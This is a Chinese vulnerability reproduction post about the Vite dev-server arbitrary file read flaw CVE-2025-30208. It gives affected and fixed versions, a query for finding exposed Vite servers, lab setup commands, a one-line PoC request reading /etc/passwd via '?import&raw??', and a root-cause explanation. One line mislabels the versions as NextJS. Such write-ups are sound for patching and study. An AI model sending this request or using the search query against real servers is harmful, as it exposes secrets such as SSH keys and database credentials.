Vite任意文件读取漏洞:CVE-2025-30208 POC

admin 2025年4月1日23:54:26评论6 views字数 1035阅读3分27秒阅读模式
Vite任意文件读取漏洞:CVE-2025-30208 POC
免责声明!

本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法

0x01 漏洞描述

Vite是一款现代化的前端开发构建工具,它提供了快速的开发服务器和高效的构建能力,广泛应用于Vue.js项目的开发过程中。
由于Vite开发服务器在处理特定URL请求时,没有对请求的路径进行严格的安全检查和限制,导致攻击者可以绕过保护机制,非法访问项目根目录外的敏感文件。攻击者只需在浏览器输入一个URL,就可能会造成源码、SSH密钥、数据库账号、用户数据等目标机器上的任意文件信息泄露。
0x02 影响范围

目前受影响的NextJS版本:

    6.2.0 <= Vite <= 6.2.2

    6.1.0 <= Vite <= 6.1.1

    6.0.0 <= Vite <= 6.0.11

    5.0.0 <= Vite <= 5.4.14

    Vite <= 4.5.9 

0x03 资产测绘

body="/@vite/client"
Vite任意文件读取漏洞:CVE-2025-30208 POC
0x04 环境搭建

1、克隆项目代码:
git clone https://github.com/ai862/Vite-demo.git
Vite任意文件读取漏洞:CVE-2025-30208 POC
2、更新apt:
apt-get update
3、下载npm:
apt install npm -y
Vite任意文件读取漏洞:CVE-2025-30208 POC
4、安装项目依赖:
npm install --legacy-peer-deps
Vite任意文件读取漏洞:CVE-2025-30208 POC
5、启动开发服务器:
npm run dev
Vite任意文件读取漏洞:CVE-2025-30208 POC
Vite任意文件读取漏洞:CVE-2025-30208 POC
0x05 漏洞利用及复现过程

触发的POC:
GET /@fs/etc/passwd?import&raw?? HTTP/1.1Content-Type: application/jsonHost192.168.127.128:4173/
Vite任意文件读取漏洞:CVE-2025-30208 POC
Vite任意文件读取漏洞:CVE-2025-30208 POC
0x06 漏洞触发原理

原始代码直接使用未经处理的url进行校验。攻击者可在URL中添加?raw???import&raw??绕过此限制。

正则匹配绕过
rawRE/urlRE
的正则设计可能无法处理尾部特殊符号。例如,假设rawRE设计为/^/@fs//,但实际URL/@fs/etc/passwd?,正则匹配仍会通过(?被视为查询参数起始符,但未正确剥离)。

0x07 修复方案

升级Vite版本

  • >=6.2.3
  • >=6.1.2, <6.2.0
  • >=6.0.12, <6.1.0
  • >=5.4.15, <6.0.0
  • >=4.5.10, <5.0.0

Vite的官方修复在上文已分析

原文始发于微信公众号(零日安全实验室):漏洞复现篇 | Vite任意文件读取漏洞:CVE-2025-30208,最新!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月1日23:54:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vite任意文件读取漏洞:CVE-2025-30208 POChttps://cn-sec.com/archives/3895744.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息